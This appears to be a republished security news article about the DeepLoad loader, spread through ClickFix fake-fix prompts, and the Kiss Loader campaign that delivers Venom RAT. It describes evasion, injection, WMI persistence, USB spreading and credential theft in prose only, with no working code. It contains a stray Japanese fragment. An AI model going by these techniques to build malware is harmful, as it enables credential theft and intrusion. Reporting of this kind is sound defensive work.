The new campaign utilizes ClickFix social engineering tactics as a method to distribute a previously undocumented malware loader called DeepLoad.
“While likely using AI-assisted obfuscation and process injection to evade static scans, credential theft begins quickly, capturing passwords and sessions even if the primary loader is blocked,” ReliaQuest researchers Thassanai McCabe and Andrew Currie said in a report shared with The Hacker News.
The starting point of the attack chain is to attack Windows under the pretext of addressing a non-existent problem.[ファイル名を指定して実行]ClickFix tricks users into running PowerShell commands by pasting the commands into a dialog. It uses ‘mshta.exe’, a legitimate Windows utility to download and run an obfuscated PowerShell loader.
The loader has been found to hide its actual functionality behind meaningless variable assignments, presumably in an attempt to fool security tools. The attackers are credited with using artificial intelligence (AI) tools to develop the obfuscation layer.
DeepLoad blends into normal Windows activity and makes a deliberate effort to be unobtrusive. This involves hiding the payload inside an executable file named ‘LockAppHost.exe’, which is a legitimate Windows process that manages the lock screen.
Additionally, rather than relying on PowerShell’s built-in commands to launch processes and modify memory, the malware hides its tracks by disabling PowerShell command history and calling native Windows core functionality directly. Doing so bypasses common monitoring hooks that monitor PowerShell-based activity.
ReliaQuest said, “To avoid file-based detection, DeepLoad uses the built-in PowerShell feature Add-Type to generate a secondary component on the fly that compiles and executes code written in C#.” “This will generate a temporary dynamic link library (DLL) file and drop it into the user’s Temp directory.”
This provides a way for malware to evade filename-based detection, as the DLL is compiled and written with a randomized filename each time it is executed.
Another notable defense evasion tactic employed by DeepLoad is the use of asynchronous procedure call (APC) injection, which launches the target process in a suspended state, writes shellcode to memory, resumes execution of the process, and then executes the main payload within a trusted Windows process without writing the decoded payload to disk.
DeepLoad is designed to facilitate credential theft by extracting browser passwords from hosts. It also drops malicious browser extensions. This extension intercepts credentials entered on the login page and persists for the entire user session unless explicitly removed.
A more dangerous feature of this malware is its ability to automatically detect when a removable media device, such as a USB drive, is connected and copy malware-laced files using names such as “ChromeSetup.lnk”, “Firefox Installer.lnk”, and “AnyDesk.lnk”, causing infection when double-clicked.
“DeepLoad used Windows Management Instrumentation (WMI) to reinfect ‘clean’ hosts after three days without any user interaction or attacker interaction,” ReliaQuest explained. “WMI served two purposes: it broke the parent-child process chain that most detection rules were built to detect, and it created a WMI event subscription that would later silently re-execute the attack.”
The goal appears to be to deploy multipurpose malware that can perform malicious actions throughout the cyber kill chain, avoid writing artifacts to disk, infiltrate Windows processes, and quickly spread to other machines to evade detection by security controls.
This disclosure comes after G DATA detailed another malware loader called Kiss Loader that is distributed through Windows Internet shortcut files (URLs) attached to phishing emails. The malware loader connects to a remote WebDAV resource hosted on the TryCloudflare domain and serves a second shortcut disguised as a PDF document.
Once the shortcut is executed, it launches the WSH script responsible for running the JavaScript component, continues to retrieve and run the batch script that displays the decoy PDF, sets persistence in the Startup folder, and downloads the Python-based Kiss Loader. In the final stage, the loader uses APC injection to decrypt and execute Venom RAT, a variant of AsyncRAT.
It is currently unknown how widespread attacks deploying Kiss Loader are and whether Kiss Loader is offered in a malware-as-a-service (MaaS) model. That said, the attackers behind Loader claim to be from Malawi.
Source link
